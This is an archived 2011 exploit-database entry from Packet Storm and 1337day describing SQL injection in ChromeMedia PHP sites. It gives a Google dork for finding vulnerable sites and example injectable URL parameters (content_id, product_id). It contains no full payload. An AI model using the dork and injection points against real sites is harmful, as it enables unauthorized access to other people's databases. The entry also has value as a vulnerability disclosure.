ChromeMedia SQL Injection

2011-05-24T00:00:00
ID PACKETSTORM:101635
Type packetstorm
Reporter Kalashinkov3
Modified 2011-05-24T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm kalashinkov3 member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
#########################################################  
# Title : ChromeMedia SQL Injection Vulnerability  
# Author: Kalashinkov3  
# Vendor: [www.chromemedia.com]  
# Email : kalashinkov3[at]Hotmail[dot].Fr  
# Date : 22/05/2011  
# Google Dork : intext:"Web Design by ChromeMedia Inc" inurl:*.php?  
# Category : PHP [SQli]   
#########################################################   
  
*_Exploit_*  
  
# http://[localhost]/*/*/article.php?content_id='22  
# http://[localhost]/*/*/article.php?content_id=[SQLI]  
  
  
# http://[localhost]/*/*/details.php?product_id='20  
# http://[localhost]/*/*/details.php?product_id=[SQLI]  
  
# all php files "*.php?*_id= " are vulnerable #  
  
  
^_^ G00d LUCK ALL :=)  
  
=========================================================================  
# Greets To : BrOx-dz & all Algerians Hacker'S ;) & All mmembre 1337Day #  
=========================================================================  
`